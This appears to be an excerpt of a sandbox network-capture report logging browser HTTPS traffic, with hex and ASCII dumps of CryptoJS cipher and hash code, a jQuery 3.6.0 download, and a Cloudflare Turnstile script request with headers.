                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e
                                                                  Data Ascii: (var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b
                                                                  Data Ascii: ;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a
                                                                  Data Ascii: er,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
                                                                  Data Ascii: charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNO
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68
                                                                  Data Ascii: (a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=th
                                                                  2025-01-13 21:37:21 UTC1369INData Raw: 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c
                                                                  Data Ascii: ]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.1649733151.101.2.1374437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:21 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                  Host: code.jquery.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:21 UTC613INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  Content-Length: 89501
                                                                  Server: nginx
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                  ETag: "28feccc0-15d9d"
                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                  Access-Control-Allow-Origin: *
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                  Accept-Ranges: bytes
                                                                  Age: 2288767
                                                                  Date: Mon, 13 Jan 2025 21:37:21 GMT
                                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740067-EWR
                                                                  X-Cache: HIT, HIT
                                                                  X-Cache-Hits: 2774, 0
                                                                  X-Timer: S1736804242.503788,VS0,VE1
                                                                  Vary: Accept-Encoding
                                                                  2025-01-13 21:37:21 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                  2025-01-13 21:37:21 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                  2025-01-13 21:37:21 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                  2025-01-13 21:37:21 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                  2025-01-13 21:37:21 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                  2025-01-13 21:37:21 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                  2025-01-13 21:37:21 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                  2025-01-13 21:37:21 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                  2025-01-13 21:37:21 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                  2025-01-13 21:37:21 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.1649734104.18.95.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:22 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:22 UTC471INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:22 GMT
                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                  Content-Length: 47521
                                                                  Connection: close
                                                                  accept-ranges: bytes
                                                                  last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                  access-control-allow-origin: *
                                                                  cross-origin-resource-policy: cross-origin
                                                                  Server: cloudflare
                                                                  CF-RAY: 901886f13d680f70-EWR
                                                                  alt-svc: h3=":443"; ma=86400
